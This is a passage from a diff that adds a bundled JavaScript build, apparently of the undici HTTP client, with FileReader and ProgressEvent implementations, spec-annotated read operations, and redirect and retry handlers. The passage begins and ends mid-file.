'UTF-16LE' + case 'x-user-defined': + return 'x-user-defined' + default: return 'failure' + } +} + +module.exports = { + getEncoding +} + + +/***/ }), + +/***/ 1446: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + staticPropertyDescriptors, + readOperation, + fireAProgressEvent +} = __nccwpck_require__(7530) +const { + kState, + kError, + kResult, + kEvents, + kAborted +} = __nccwpck_require__(9054) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + +class FileReader extends EventTarget { + constructor () { + super() + + this[kState] = 'empty' + this[kResult] = null + this[kError] = null + this[kEvents] = { + loadend: null, + error: null, + abort: null, + load: null, + progress: null, + loadstart: null + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-readAsArrayBuffer + * @param {import('buffer').Blob} blob + */ + readAsArrayBuffer (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsArrayBuffer' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsArrayBuffer(blob) method, when invoked, + // must initiate a read operation for blob with ArrayBuffer. + readOperation(this, blob, 'ArrayBuffer') + } + + /** + * @see https://w3c.github.io/FileAPI/#readAsBinaryString + * @param {import('buffer').Blob} blob + */ + readAsBinaryString (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsBinaryString' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsBinaryString(blob) method, when invoked, + // must initiate a read operation for blob with BinaryString. + readOperation(this, blob, 'BinaryString') + } + + /** + * @see https://w3c.github.io/FileAPI/#readAsDataText + * @param {import('buffer').Blob} blob + * @param {string?} encoding + */ + readAsText (blob, encoding = undefined) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsText' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + if (encoding !== undefined) { + encoding = webidl.converters.DOMString(encoding) + } + + // The readAsText(blob, encoding) method, when invoked, + // must initiate a read operation for blob with Text and encoding. + readOperation(this, blob, 'Text', encoding) + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-readAsDataURL + * @param {import('buffer').Blob} blob + */ + readAsDataURL (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsDataURL' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsDataURL(blob) method, when invoked, must + // initiate a read operation for blob with DataURL. + readOperation(this, blob, 'DataURL') + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-abort + */ + abort () { + // 1. If this's state is "empty" or if this's state is + // "done" set this's result to null and terminate + // this algorithm. + if (this[kState] === 'empty' || this[kState] === 'done') { + this[kResult] = null + return + } + + // 2. If this's state is "loading" set this's state to + // "done" and set this's result to null. + if (this[kState] === 'loading') { + this[kState] = 'done' + this[kResult] = null + } + + // 3. If there are any tasks from this on the file reading + // task source in an affiliated task queue, then remove + // those tasks from that task queue. + this[kAborted] = true + + // 4. Terminate the algorithm for the read method being processed. + // TODO + + // 5. Fire a progress event called abort at this. + fireAProgressEvent('abort', this) + + // 6. If this's state is not "loading", fire a progress + // event called loadend at this. + if (this[kState] !== 'loading') { + fireAProgressEvent('loadend', this) + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-readystate + */ + get readyState () { + webidl.brandCheck(this, FileReader) + + switch (this[kState]) { + case 'empty': return this.EMPTY + case 'loading': return this.LOADING + case 'done': return this.DONE + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-result + */ + get result () { + webidl.brandCheck(this, FileReader) + + // The result attribute’s getter, when invoked, must return + // this's result. + return this[kResult] + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-error + */ + get error () { + webidl.brandCheck(this, FileReader) + + // The error attribute’s getter, when invoked, must return + // this's error. + return this[kError] + } + + get onloadend () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].loadend + } + + set onloadend (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].loadend) { + this.removeEventListener('loadend', this[kEvents].loadend) + } + + if (typeof fn === 'function') { + this[kEvents].loadend = fn + this.addEventListener('loadend', fn) + } else { + this[kEvents].loadend = null + } + } + + get onerror () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].error + } + + set onerror (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].error) { + this.removeEventListener('error', this[kEvents].error) + } + + if (typeof fn === 'function') { + this[kEvents].error = fn + this.addEventListener('error', fn) + } else { + this[kEvents].error = null + } + } + + get onloadstart () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].loadstart + } + + set onloadstart (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].loadstart) { + this.removeEventListener('loadstart', this[kEvents].loadstart) + } + + if (typeof fn === 'function') { + this[kEvents].loadstart = fn + this.addEventListener('loadstart', fn) + } else { + this[kEvents].loadstart = null + } + } + + get onprogress () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].progress + } + + set onprogress (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].progress) { + this.removeEventListener('progress', this[kEvents].progress) + } + + if (typeof fn === 'function') { + this[kEvents].progress = fn + this.addEventListener('progress', fn) + } else { + this[kEvents].progress = null + } + } + + get onload () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].load + } + + set onload (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].load) { + this.removeEventListener('load', this[kEvents].load) + } + + if (typeof fn === 'function') { + this[kEvents].load = fn + this.addEventListener('load', fn) + } else { + this[kEvents].load = null + } + } + + get onabort () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].abort + } + + set onabort (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].abort) { + this.removeEventListener('abort', this[kEvents].abort) + } + + if (typeof fn === 'function') { + this[kEvents].abort = fn + this.addEventListener('abort', fn) + } else { + this[kEvents].abort = null + } + } +} + +// https://w3c.github.io/FileAPI/#dom-filereader-empty +FileReader.EMPTY = FileReader.prototype.EMPTY = 0 +// https://w3c.github.io/FileAPI/#dom-filereader-loading +FileReader.LOADING = FileReader.prototype.LOADING = 1 +// https://w3c.github.io/FileAPI/#dom-filereader-done +FileReader.DONE = FileReader.prototype.DONE = 2 + +Object.defineProperties(FileReader.prototype, { + EMPTY: staticPropertyDescriptors, + LOADING: staticPropertyDescriptors, + DONE: staticPropertyDescriptors, + readAsArrayBuffer: kEnumerableProperty, + readAsBinaryString: kEnumerableProperty, + readAsText: kEnumerableProperty, + readAsDataURL: kEnumerableProperty, + abort: kEnumerableProperty, + readyState: kEnumerableProperty, + result: kEnumerableProperty, + error: kEnumerableProperty, + onloadstart: kEnumerableProperty, + onprogress: kEnumerableProperty, + onload: kEnumerableProperty, + onabort: kEnumerableProperty, + onerror: kEnumerableProperty, + onloadend: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'FileReader', + writable: false, + enumerable: false, + configurable: true + } +}) + +Object.defineProperties(FileReader, { + EMPTY: staticPropertyDescriptors, + LOADING: staticPropertyDescriptors, + DONE: staticPropertyDescriptors +}) + +module.exports = { + FileReader +} + + +/***/ }), + +/***/ 5504: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) + +const kState = Symbol('ProgressEvent state') + +/** + * @see https://xhr.spec.whatwg.org/#progressevent + */ +class ProgressEvent extends Event { + constructor (type, eventInitDict = {}) { + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.ProgressEventInit(eventInitDict ?? {}) + + super(type, eventInitDict) + + this[kState] = { + lengthComputable: eventInitDict.lengthComputable, + loaded: eventInitDict.loaded, + total: eventInitDict.total + } + } + + get lengthComputable () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].lengthComputable + } + + get loaded () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].loaded + } + + get total () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].total + } +} + +webidl.converters.ProgressEventInit = webidl.dictionaryConverter([ + { + key: 'lengthComputable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'loaded', + converter: webidl.converters['unsigned long long'], + defaultValue: 0 + }, + { + key: 'total', + converter: webidl.converters['unsigned long long'], + defaultValue: 0 + }, + { + key: 'bubbles', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'cancelable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'composed', + converter: webidl.converters.boolean, + defaultValue: false + } +]) + +module.exports = { + ProgressEvent +} + + +/***/ }), + +/***/ 9054: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kState: Symbol('FileReader state'), + kResult: Symbol('FileReader result'), + kError: Symbol('FileReader error'), + kLastProgressEventFired: Symbol('FileReader last progress event fired timestamp'), + kEvents: Symbol('FileReader events'), + kAborted: Symbol('FileReader aborted') +} + + +/***/ }), + +/***/ 7530: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + kState, + kError, + kResult, + kAborted, + kLastProgressEventFired +} = __nccwpck_require__(9054) +const { ProgressEvent } = __nccwpck_require__(5504) +const { getEncoding } = __nccwpck_require__(4854) +const { DOMException } = __nccwpck_require__(1037) +const { serializeAMimeType, parseMIMEType } = __nccwpck_require__(685) +const { types } = __nccwpck_require__(3837) +const { StringDecoder } = __nccwpck_require__(1576) +const { btoa } = __nccwpck_require__(4300) + +/** @type {PropertyDescriptor} */ +const staticPropertyDescriptors = { + enumerable: true, + writable: false, + configurable: false +} + +/** + * @see https://w3c.github.io/FileAPI/#readOperation + * @param {import('./filereader').FileReader} fr + * @param {import('buffer').Blob} blob + * @param {string} type + * @param {string?} encodingName + */ +function readOperation (fr, blob, type, encodingName) { + // 1. If fr’s state is "loading", throw an InvalidStateError + // DOMException. + if (fr[kState] === 'loading') { + throw new DOMException('Invalid state', 'InvalidStateError') + } + + // 2. Set fr’s state to "loading". + fr[kState] = 'loading' + + // 3. Set fr’s result to null. + fr[kResult] = null + + // 4. Set fr’s error to null. + fr[kError] = null + + // 5. Let stream be the result of calling get stream on blob. + /** @type {import('stream/web').ReadableStream} */ + const stream = blob.stream() + + // 6. Let reader be the result of getting a reader from stream. + const reader = stream.getReader() + + // 7. Let bytes be an empty byte sequence. + /** @type {Uint8Array[]} */ + const bytes = [] + + // 8. Let chunkPromise be the result of reading a chunk from + // stream with reader. + let chunkPromise = reader.read() + + // 9. Let isFirstChunk be true. + let isFirstChunk = true + + // 10. In parallel, while true: + // Note: "In parallel" just means non-blocking + // Note 2: readOperation itself cannot be async as double + // reading the body would then reject the promise, instead + // of throwing an error. + ;(async () => { + while (!fr[kAborted]) { + // 1. Wait for chunkPromise to be fulfilled or rejected. + try { + const { done, value } = await chunkPromise + + // 2. If chunkPromise is fulfilled, and isFirstChunk is + // true, queue a task to fire a progress event called + // loadstart at fr. + if (isFirstChunk && !fr[kAborted]) { + queueMicrotask(() => { + fireAProgressEvent('loadstart', fr) + }) + } + + // 3. Set isFirstChunk to false. + isFirstChunk = false + + // 4. If chunkPromise is fulfilled with an object whose + // done property is false and whose value property is + // a Uint8Array object, run these steps: + if (!done && types.isUint8Array(value)) { + // 1. Let bs be the byte sequence represented by the + // Uint8Array object. + + // 2. Append bs to bytes. + bytes.push(value) + + // 3. If roughly 50ms have passed since these steps + // were last invoked, queue a task to fire a + // progress event called progress at fr. + if ( + ( + fr[kLastProgressEventFired] === undefined || + Date.now() - fr[kLastProgressEventFired] >= 50 + ) && + !fr[kAborted] + ) { + fr[kLastProgressEventFired] = Date.now() + queueMicrotask(() => { + fireAProgressEvent('progress', fr) + }) + } + + // 4. Set chunkPromise to the result of reading a + // chunk from stream with reader. + chunkPromise = reader.read() + } else if (done) { + // 5. Otherwise, if chunkPromise is fulfilled with an + // object whose done property is true, queue a task + // to run the following steps and abort this algorithm: + queueMicrotask(() => { + // 1. Set fr’s state to "done". + fr[kState] = 'done' + + // 2. Let result be the result of package data given + // bytes, type, blob’s type, and encodingName. + try { + const result = packageData(bytes, type, blob.type, encodingName) + + // 4. Else: + + if (fr[kAborted]) { + return + } + + // 1. Set fr’s result to result. + fr[kResult] = result + + // 2. Fire a progress event called load at the fr. + fireAProgressEvent('load', fr) + } catch (error) { + // 3. If package data threw an exception error: + + // 1. Set fr’s error to error. + fr[kError] = error + + // 2. Fire a progress event called error at fr. + fireAProgressEvent('error', fr) + } + + // 5. If fr’s state is not "loading", fire a progress + // event called loadend at the fr. + if (fr[kState] !== 'loading') { + fireAProgressEvent('loadend', fr) + } + }) + + break + } + } catch (error) { + if (fr[kAborted]) { + return + } + + // 6. Otherwise, if chunkPromise is rejected with an + // error error, queue a task to run the following + // steps and abort this algorithm: + queueMicrotask(() => { + // 1. Set fr’s state to "done". + fr[kState] = 'done' + + // 2. Set fr’s error to error. + fr[kError] = error + + // 3. Fire a progress event called error at fr. + fireAProgressEvent('error', fr) + + // 4. If fr’s state is not "loading", fire a progress + // event called loadend at fr. + if (fr[kState] !== 'loading') { + fireAProgressEvent('loadend', fr) + } + }) + + break + } + } + })() +} + +/** + * @see https://w3c.github.io/FileAPI/#fire-a-progress-event + * @see https://dom.spec.whatwg.org/#concept-event-fire + * @param {string} e The name of the event + * @param {import('./filereader').FileReader} reader + */ +function fireAProgressEvent (e, reader) { + // The progress event e does not bubble. e.bubbles must be false + // The progress event e is NOT cancelable. e.cancelable must be false + const event = new ProgressEvent(e, { + bubbles: false, + cancelable: false + }) + + reader.dispatchEvent(event) +} + +/** + * @see https://w3c.github.io/FileAPI/#blob-package-data + * @param {Uint8Array[]} bytes + * @param {string} type + * @param {string?} mimeType + * @param {string?} encodingName + */ +function packageData (bytes, type, mimeType, encodingName) { + // 1. A Blob has an associated package data algorithm, given + // bytes, a type, a optional mimeType, and a optional + // encodingName, which switches on type and runs the + // associated steps: + + switch (type) { + case 'DataURL': { + // 1. Return bytes as a DataURL [RFC2397] subject to + // the considerations below: + // * Use mimeType as part of the Data URL if it is + // available in keeping with the Data URL + // specification [RFC2397]. + // * If mimeType is not available return a Data URL + // without a media-type. [RFC2397]. + + // https://datatracker.ietf.org/doc/html/rfc2397#section-3 + // dataurl := "data:" [ mediatype ] [ ";base64" ] "," data + // mediatype := [ type "/" subtype ] *( ";" parameter ) + // data := *urlchar + // parameter := attribute "=" value + let dataURL = 'data:' + + const parsed = parseMIMEType(mimeType || 'application/octet-stream') + + if (parsed !== 'failure') { + dataURL += serializeAMimeType(parsed) + } + + dataURL += ';base64,' + + const decoder = new StringDecoder('latin1') + + for (const chunk of bytes) { + dataURL += btoa(decoder.write(chunk)) + } + + dataURL += btoa(decoder.end()) + + return dataURL + } + case 'Text': { + // 1. Let encoding be failure + let encoding = 'failure' + + // 2. If the encodingName is present, set encoding to the + // result of getting an encoding from encodingName. + if (encodingName) { + encoding = getEncoding(encodingName) + } + + // 3. If encoding is failure, and mimeType is present: + if (encoding === 'failure' && mimeType) { + // 1. Let type be the result of parse a MIME type + // given mimeType. + const type = parseMIMEType(mimeType) + + // 2. If type is not failure, set encoding to the result + // of getting an encoding from type’s parameters["charset"]. + if (type !== 'failure') { + encoding = getEncoding(type.parameters.get('charset')) + } + } + + // 4. If encoding is failure, then set encoding to UTF-8. + if (encoding === 'failure') { + encoding = 'UTF-8' + } + + // 5. Decode bytes using fallback encoding encoding, and + // return the result. + return decode(bytes, encoding) + } + case 'ArrayBuffer': { + // Return a new ArrayBuffer whose contents are bytes. + const sequence = combineByteSequences(bytes) + + return sequence.buffer + } + case 'BinaryString': { + // Return bytes as a binary string, in which every byte + // is represented by a code unit of equal value [0..255]. + let binaryString = '' + + const decoder = new StringDecoder('latin1') + + for (const chunk of bytes) { + binaryString += decoder.write(chunk) + } + + binaryString += decoder.end() + + return binaryString + } + } +} + +/** + * @see https://encoding.spec.whatwg.org/#decode + * @param {Uint8Array[]} ioQueue + * @param {string} encoding + */ +function decode (ioQueue, encoding) { + const bytes = combineByteSequences(ioQueue) + + // 1. Let BOMEncoding be the result of BOM sniffing ioQueue. + const BOMEncoding = BOMSniffing(bytes) + + let slice = 0 + + // 2. If BOMEncoding is non-null: + if (BOMEncoding !== null) { + // 1. Set encoding to BOMEncoding. + encoding = BOMEncoding + + // 2. Read three bytes from ioQueue, if BOMEncoding is + // UTF-8; otherwise read two bytes. + // (Do nothing with those bytes.) + slice = BOMEncoding === 'UTF-8' ? 3 : 2 + } + + // 3. Process a queue with an instance of encoding’s + // decoder, ioQueue, output, and "replacement". + + // 4. Return output. + + const sliced = bytes.slice(slice) + return new TextDecoder(encoding).decode(sliced) +} + +/** + * @see https://encoding.spec.whatwg.org/#bom-sniff + * @param {Uint8Array} ioQueue + */ +function BOMSniffing (ioQueue) { + // 1. Let BOM be the result of peeking 3 bytes from ioQueue, + // converted to a byte sequence. + const [a, b, c] = ioQueue + + // 2. For each of the rows in the table below, starting with + // the first one and going down, if BOM starts with the + // bytes given in the first column, then return the + // encoding given in the cell in the second column of that + // row. Otherwise, return null. + if (a === 0xEF && b === 0xBB && c === 0xBF) { + return 'UTF-8' + } else if (a === 0xFE && b === 0xFF) { + return 'UTF-16BE' + } else if (a === 0xFF && b === 0xFE) { + return 'UTF-16LE' + } + + return null +} + +/** + * @param {Uint8Array[]} sequences + */ +function combineByteSequences (sequences) { + const size = sequences.reduce((a, b) => { + return a + b.byteLength + }, 0) + + let offset = 0 + + return sequences.reduce((a, b) => { + a.set(b, offset) + offset += b.byteLength + return a + }, new Uint8Array(size)) +} + +module.exports = { + staticPropertyDescriptors, + readOperation, + fireAProgressEvent +} + + +/***/ }), + +/***/ 1892: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +// We include a version number for the Dispatcher API. In case of breaking changes, +// this version number must be increased to avoid conflicts. +const globalDispatcher = Symbol.for('undici.globalDispatcher.1') +const { InvalidArgumentError } = __nccwpck_require__(8045) +const Agent = __nccwpck_require__(7890) + +if (getGlobalDispatcher() === undefined) { + setGlobalDispatcher(new Agent()) +} + +function setGlobalDispatcher (agent) { + if (!agent || typeof agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument agent must implement Agent') + } + Object.defineProperty(globalThis, globalDispatcher, { + value: agent, + writable: true, + enumerable: false, + configurable: false + }) +} + +function getGlobalDispatcher () { + return globalThis[globalDispatcher] +} + +module.exports = { + setGlobalDispatcher, + getGlobalDispatcher +} + + +/***/ }), + +/***/ 6930: +/***/ ((module) => { + +"use strict"; + + +module.exports = class DecoratorHandler { + constructor (handler) { + this.handler = handler + } + + onConnect (...args) { + return this.handler.onConnect(...args) + } + + onError (...args) { + return this.handler.onError(...args) + } + + onUpgrade (...args) { + return this.handler.onUpgrade(...args) + } + + onHeaders (...args) { + return this.handler.onHeaders(...args) + } + + onData (...args) { + return this.handler.onData(...args) + } + + onComplete (...args) { + return this.handler.onComplete(...args) + } + + onBodySent (...args) { + return this.handler.onBodySent(...args) + } +} + + +/***/ }), + +/***/ 2860: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const util = __nccwpck_require__(3983) +const { kBodyUsed } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const EE = __nccwpck_require__(2361) + +const redirectableStatusCodes = [300, 301, 302, 303, 307, 308] + +const kBody = Symbol('body') + +class BodyAsyncIterable { + constructor (body) { + this[kBody] = body + this[kBodyUsed] = false + } + + async * [Symbol.asyncIterator] () { + assert(!this[kBodyUsed], 'disturbed') + this[kBodyUsed] = true + yield * this[kBody] + } +} + +class RedirectHandler { + constructor (dispatch, maxRedirections, opts, handler) { + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + util.validateHandler(handler, opts.method, opts.upgrade) + + this.dispatch = dispatch + this.location = null + this.abort = null + this.opts = { ...opts, maxRedirections: 0 } // opts must be a copy + this.maxRedirections = maxRedirections + this.handler = handler + this.history = [] + + if (util.isStream(this.opts.body)) { + // TODO (fix): Provide some way for the user to cache the file to e.g. /tmp + // so that it can be dispatched again? + // TODO (fix): Do we need 100-expect support to provide a way to do this properly? + if (util.bodyLength(this.opts.body) === 0) { + this.opts.body + .on('data', function () { + assert(false) + }) + } + + if (typeof this.opts.body.readableDidRead !== 'boolean') { + this.opts.body[kBodyUsed] = false + EE.prototype.on.call(this.opts.body, 'data', function () { + this[kBodyUsed] = true + }) + } + } else if (this.opts.body && typeof this.opts.body.pipeTo === 'function') { + // TODO (fix): We can't access ReadableStream internal state + // to determine whether or not it has been disturbed. This is just + // a workaround. + this.opts.body = new BodyAsyncIterable(this.opts.body) + } else if ( + this.opts.body && + typeof this.opts.body !== 'string' && + !ArrayBuffer.isView(this.opts.body) && + util.isIterable(this.opts.body) + ) { + // TODO: Should we allow re-using iterable if !this.opts.idempotent + // or through some other flag? + this.opts.body = new BodyAsyncIterable(this.opts.body) + } + } + + onConnect (abort) { + this.abort = abort + this.handler.onConnect(abort, { history: this.history }) + } + + onUpgrade (statusCode, headers, socket) { + this.handler.onUpgrade(statusCode, headers, socket) + } + + onError (error) { + this.handler.onError(error) + } + + onHeaders (statusCode, headers, resume, statusText) { + this.location = this.history.length >= this.maxRedirections || util.isDisturbed(this.opts.body) + ? null + : parseLocation(statusCode, headers) + + if (this.opts.origin) { + this.history.push(new URL(this.opts.path, this.opts.origin)) + } + + if (!this.location) { + return this.handler.onHeaders(statusCode, headers, resume, statusText) + } + + const { origin, pathname, search } = util.parseURL(new URL(this.location, this.opts.origin && new URL(this.opts.path, this.opts.origin))) + const path = search ? `${pathname}${search}` : pathname + + // Remove headers referring to the original URL. + // By default it is Host only, unless it's a 303 (see below), which removes also all Content-* headers. + // https://tools.ietf.org/html/rfc7231#section-6.4 + this.opts.headers = cleanRequestHeaders(this.opts.headers, statusCode === 303, this.opts.origin !== origin) + this.opts.path = path + this.opts.origin = origin + this.opts.maxRedirections = 0 + this.opts.query = null + + // https://tools.ietf.org/html/rfc7231#section-6.4.4 + // In case of HTTP 303, always replace method to be either HEAD or GET + if (statusCode === 303 && this.opts.method !== 'HEAD') { + this.opts.method = 'GET' + this.opts.body = null + } + } + + onData (chunk) { + if (this.location) { + /* + https://tools.ietf.org/html/rfc7231#section-6.4 + + TLDR: undici always ignores 3xx response bodies. + + Redirection is used to serve the requested resource from another URL, so it is assumes that + no body is generated (and thus can be ignored). Even though generating a body is not prohibited. + + For status 301, 302, 303, 307 and 308 (the latter from RFC 7238), the specs mention that the body usually + (which means it's optional and not mandated) contain just an hyperlink to the value of + the Location response header, so the body can be ignored safely. + + For status 300, which is "Multiple Choices", the spec mentions both generating a Location + response header AND a response body with the other possible location to follow. + Since the spec explicitily chooses not to specify a format for such body and leave it to + servers and browsers implementors, we ignore the body as there is no specified way to eventually parse it. + */ + } else { + return this.handler.onData(chunk) + } + } + + onComplete (trailers) { + if (this.location) { + /* + https://tools.ietf.org/html/rfc7231#section-6.4 + + TLDR: undici always ignores 3xx response trailers as they are not expected in case of redirections + and neither are useful if present. + + See comment on onData method above for more detailed informations. + */ + + this.location = null + this.abort = null + + this.dispatch(this.opts, this) + } else { + this.handler.onComplete(trailers) + } + } + + onBodySent (chunk) { + if (this.handler.onBodySent) { + this.handler.onBodySent(chunk) + } + } +} + +function parseLocation (statusCode, headers) { + if (redirectableStatusCodes.indexOf(statusCode) === -1) { + return null + } + + for (let i = 0; i < headers.length; i += 2) { + if (headers[i].toString().toLowerCase() === 'location') { + return headers[i + 1] + } + } +} + +// https://tools.ietf.org/html/rfc7231#section-6.4.4 +function shouldRemoveHeader (header, removeContent, unknownOrigin) { + return ( + (header.length === 4 && header.toString().toLowerCase() === 'host') || + (removeContent && header.toString().toLowerCase().indexOf('content-') === 0) || + (unknownOrigin && header.length === 13 && header.toString().toLowerCase() === 'authorization') || + (unknownOrigin && header.length === 6 && header.toString().toLowerCase() === 'cookie') + ) +} + +// https://tools.ietf.org/html/rfc7231#section-6.4 +function cleanRequestHeaders (headers, removeContent, unknownOrigin) { + const ret = [] + if (Array.isArray(headers)) { + for (let i = 0; i < headers.length; i += 2) { + if (!shouldRemoveHeader(headers[i], removeContent, unknownOrigin)) { + ret.push(headers[i], headers[i + 1]) + } + } + } else if (headers && typeof headers === 'object') { + for (const key of Object.keys(headers)) { + if (!shouldRemoveHeader(key, removeContent, unknownOrigin)) { + ret.push(key, headers[key]) + } + } + } else { + assert(headers == null, 'headers must be an object or an array') + } + return ret +} + +module.exports = RedirectHandler + + +/***/ }), + +/***/ 2286: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) + +const { kRetryHandlerDefaultRetry } = __nccwpck_require__(2785) +const { RequestRetryError } = __nccwpck_require__(8045) +const { isDisturbed, parseHeaders, parseRangeHeader } = __nccwpck_require__(3983) + +function calculateRetryAfterHeader (retryAfter) { + const current = Date.now() + const diff = new Date(retryAfter).getTime() - current + + return diff +} + +class RetryHandler { + constructor (opts, handlers) { + const { retryOptions, ...dispatchOpts } = opts + const { + // Retry scoped + retry: retryFn, + maxRetries, + maxTimeout, + minTimeout, + timeoutFactor, + // Response scoped + methods, + errorCodes, + retryAfter, + statusCodes + } = retryOptions ?? {} + + this.dispatch = handlers.dispatch + this.handler = handlers.handler + this.opts = dispatchOpts + this.abort = null + this.aborted = false + this.retryOpts = { + retry: retryFn ?? RetryHandler[kRetryHandlerDefaultRetry], + retryAfter: retryAfter ?? true, + maxTimeout: maxTimeout ?? 30 * 1000, // 30s, + timeout: minTimeout ?? 500, // .5s + timeoutFactor: timeoutFactor ?? 2, + maxRetries: maxRetries ?? 5, + // What errors we should retry + methods: methods ?? ['GET', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE'], + // Indicates which errors to retry + statusCodes: statusCodes ?? [500, 502, 503, 504, 429], + // List of errors to retry + errorCodes: errorCodes ?? [ + 'ECONNRESET', + 'ECONNREFUSED', + 'ENOTFOUND', + 'ENETDOWN', + 'ENETUNREACH', + 'EHOSTDOWN', + 'EHOSTUNREACH', + 'EPIPE' + ] + } + + this.retryCount = 0 + this.start = 0 + this.end = null + this.etag = null + this.resume = null + + // Handle possible onConnect duplication + this.handler.onConnect(reason => { + this.aborted = true + if (this.abort) { + this.abort(reason) + } else { + this.reason = reason + } + }) + } + + onRequestSent () { + if (this.handler.onRequestSent) { + this.handler.onRequestSent() + } + } + + onUpgrade (statusCode, headers, socket) { + if (this.handler.onUpgrade) { + this.handler.onUpgrade(statusCode, headers, socket) + } + } + + onConnect (abort) { + if (this.aborted) { + abort(this.reason) + } else { + this.abort = abort + } + } + + onBodySent (chunk) { + if (this.handler.onBodySent) return this.handler.onBodySent(chunk) + } + + static [kRetryHandlerDefaultRetry] (err, { state, opts }, cb) { + const { statusCode, code, headers } = err + const { method, retryOptions } = opts + const { + maxRetries, + timeout, + maxTimeout, + timeoutFactor, + statusCodes, + errorCodes, + methods + } = retryOptions + let { counter, currentTimeout } = state + + currentTimeout = + currentTimeout != null && currentTimeout > 0 ? currentTimeout : timeout + + // Any code that is not a Undici's originated and allowed to retry + if ( + code && + code !== 'UND_ERR_REQ_RETRY' && + code !== 'UND_ERR_SOCKET' && + !errorCodes.includes(code) + ) { + cb(err) + return + } + + // If a set of method are provided and the current method is not in the list + if (Array.isArray(methods) && !methods.includes(method)) { + cb(err) + return + } + + // If a set of status code are provided and the current status code is not in the list + if ( + statusCode != null && + Array.isArray(statusCodes) && + !statusCodes.includes(statusCode) + ) { + cb(err) + return + } + + // If we reached the max number of retries + if (counter > maxRetries) { + cb(err) + return + } + + let retryAfterHeader = headers != null && headers['retry-after'] + if (retryAfterHeader) { + retryAfterHeader = Number(retryAfterHeader) + retryAfterHeader = isNaN(retryAfterHeader) + ? calculateRetryAfterHeader(retryAfterHeader) + : retryAfterHeader * 1e3 // Retry-After is in seconds + } + + const retryTimeout = + retryAfterHeader > 0 + ? Math.min(retryAfterHeader, maxTimeout) + : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) + + state.currentTimeout = retryTimeout + + setTimeout(() => cb(null), retryTimeout) + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const headers = parseHeaders(rawHeaders) + + this.retryCount += 1 + + if (statusCode >= 300) { + this.abort( + new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Checkpoint for resume from where we left it + if (this.resume != null) { + this.resume = null + + if (statusCode !== 206) { + return true + } + + const contentRange = parseRangeHeader(headers['content-range']) + // If no content range + if (!contentRange) { + this.abort( + new RequestRetryError('Content-Range mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Let's start with a weak etag check + if (this.etag != null && this.etag !== headers.etag) { + this.abort( + new RequestRetryError('ETag mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + const { start, size, end = size } = contentRange + + assert(this.start === start, 'content-range mismatch') + assert(this.end == null || this.end === end, 'content-range mismatch') + + this.resume = resume + return true + } + + if (this.end == null) { + if (statusCode === 206) { + // First time we receive 206 + const range = parseRangeHeader(headers['content-range']) + + if (range == null) { + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const { start, size, end = size } = range + + assert( + start != null && Number.isFinite(start) && this.start !== start, + 'content-range mismatch' + ) + assert(Number.isFinite(start)) + assert( + end != null && Number.isFinite(end) && this.end !== end, + 'invalid content-length' + ) + + this.start = start + this.end = end + } + + // We make our best to checkpoint the body for further range headers + if (this.end == null) { + const contentLength = headers['content-length'] + this.end = contentLength != null ? 